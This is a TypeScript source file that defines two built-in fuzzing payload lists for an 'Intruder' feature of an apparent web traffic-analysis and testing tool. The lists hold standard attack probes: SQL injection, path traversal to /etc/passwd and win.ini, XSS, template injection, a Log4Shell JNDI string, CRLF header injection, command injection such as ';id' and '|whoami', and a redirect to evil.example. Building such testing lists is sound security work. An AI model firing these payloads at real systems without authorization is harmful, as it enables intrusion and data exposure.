import type { IntruderBuiltInPayloadListDefinition } from './intruderBuiltInPayloadCatalogShared'

export const INTRUDER_FUZZING_PAYLOAD_LISTS: IntruderBuiltInPayloadListDefinition[] = [
  {
    id: 'fuzzing-quick',
    categoryKey: 'trafficAnalysis.intruder.builtInPayloadListCategories.fuzzing',
    labelKey: 'trafficAnalysis.intruder.builtInPayloadLists.fuzzingQuick',
    descriptionKey: 'trafficAnalysis.intruder.builtInPayloadDescriptions.fuzzingQuick',
    aliases: ['fuzz', 'quick', 'fast', 'payload', '探测', '快速'],
    tags: ['fuzz', 'quick', 'generic'],
    recommendedAttackTypes: ['sniper', 'batteringRam'],
    recommendedPositionHints: ['input', 'query', 'param', 'id', 'q', 'search'],
    items: [
      "'",
      '"',
      '`',
      '../',
      '../../',
      '..%2f',
      '%00',
      '<script>alert(1)</script>',
      '${7*7}',
      '{{7*7}}',
      ';id',
      '|whoami',
    ],
  },
  {
    id: 'fuzzing-full',
    categoryKey: 'trafficAnalysis.intruder.builtInPayloadListCategories.fuzzing',
    labelKey: 'trafficAnalysis.intruder.builtInPayloadLists.fuzzingFull',
    descriptionKey: 'trafficAnalysis.intruder.builtInPayloadDescriptions.fuzzingFull',
    aliases: ['fuzz', 'full', 'deep', 'payload', '完整', '深度'],
    tags: ['fuzz', 'deep', 'generic'],
    recommendedAttackTypes: ['sniper', 'batteringRam'],
    recommendedPositionHints: ['input', 'query', 'param', 'id', 'q', 'search'],
    items: [
      "' OR '1'='1",
      '" OR "1"="1',
      '../../../etc/passwd',
      '..\\\\..\\\\windows\\\\win.ini',
      '${jndi:ldap://127.0.0.1/a}',
      '<img src=x onerror=alert(1)>',
      '<svg onload=alert(1)>',
      '{{7*7}}',
      '${7*7}',
      '%0d%0aSet-Cookie:intruder=1',
      ';sleep 5',
      '|ping -c 1 127.0.0.1',
      '||nslookup example.com',
      '`id`',
      '../../../../../../../../',
      '%252e%252e%252f',
      '%00admin',
      '%ff',
      '../../WEB-INF/web.xml',
      '/?redirect=https://evil.example',
    ],
  },
]
